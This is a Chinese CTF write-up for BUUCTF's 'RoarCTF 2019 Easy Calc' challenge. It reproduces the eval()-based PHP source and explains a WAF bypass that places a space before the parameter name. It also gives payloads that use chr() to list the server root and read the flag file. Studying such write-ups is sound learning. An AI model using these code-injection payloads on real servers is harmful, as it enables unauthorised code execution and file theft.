BUUCTF——WEB(8)

目录

[RoarCTF 2019Easy Calc 1](#[RoarCTF 2019]Easy Calc 1)

RoarCTF 2019Easy Calc 1

简易计算器

尝试不同字符

没有发现什么

审阅源码查看

有WAF

有一个calc.php文件可以通过num参数进行GET传参

访问calc.php,是一个过滤规则

复制代码
<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];		#定义 "黑名单数组",包含需要过滤的字符
        foreach ($blacklist as $blackitem) {		#foreach 遍历数组,依次把blacklist中的每个字符赋值给$blackitem
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

黑名单过滤了单 / 双引号,可通过chr()函数(根据 ASCII 码生成字符)绕过:

scandir()函数扫描服务器根目录

var_dump()PHP 内置函数,会打印出参数的类型 + 值 (比如数组的所有元素),比echo更适合查看目录列表(数组类型)

scandir(chr(47))扫描服务器根目录

  • scandir(目录路径):PHP 内置函数,扫描指定目录,返回该目录下的所有文件 / 文件夹组成的数组;

  • chr(47):ASCII 码 47 对应字符/(Linux 服务器的根目录),用chr()绕过黑名单对引号的过滤(无法直接写scandir('/'),因为单引号在黑名单)。

测试WAF

复制代码
calc.php?num=a

猜测WAF在检测num的值,如果num传入数字不被拦截,

num等于1',出现what are you want to do,WAF没有拦截,

num等于字符,WAF拦截

num等于非数字字符串,WAF拦截

传递其他参数,WAF并没有拦截,执行calc.php文件内容,num为空,高亮显示代码

因此需要传递num参数,通过WAF检测,还要num的参数绕过calc.php代码的过滤

想要通过WAF检测

就需要一个让WAF认为传递的参数不是num,

让php文件认为传递的参数是num

在num前加一个空格,利用字符串解析的特性

使用空格num,使WAF认为传递的不是num参数,通过WAF检测,这样waf就找不到num这个变量了,因为WAF来看变量叫空格num,而不是num

但是php解析的时候,会删除前后的空白符(空格符,制表符,换行符等统称为空白符);将某些字符转换为下划线(包括空格);这样代码就可以运行

通过在num前面加空格成功绕过WAF

绕过php代码的过滤,

传入

复制代码
calc.php? num=phpinfo()

那么使用

var_dump()输出变量的相关信息

scandir()函数以数组形式返回指定目录中的目录和文件

var_dump(scandir("/")) 用来输出根目录下的文件

但是双引号被过滤了 ,

chr(ASCII码):将数字 ASCII 码转为对应字符

ord(字符):将字符转为对应 ASCII 码

可以使用ASCII,chr(47)表示/

var_dump(scandir(chr(47))

构造Payload

复制代码
calc.php? num=var_dump(scandir(chr(47)))

输出

有个f1agg文件

尝试读取

file_get_contents()函数传入参数为文件路径,将整个文件读入一个字符串中

构造Payload

复制代码
calc.php? num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

47、102、49、97、103、103分别是\f1agg的ASCII编码
相关推荐
treesforest16 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安16 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
上海云盾第一敬业销售16 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手16 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub16 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61116 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
爱网络爱Linux16 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc16 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing16 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
顾凌陵16 天前
Web安全二阶段综合测试:知识点速查与实战技巧
安全·web安全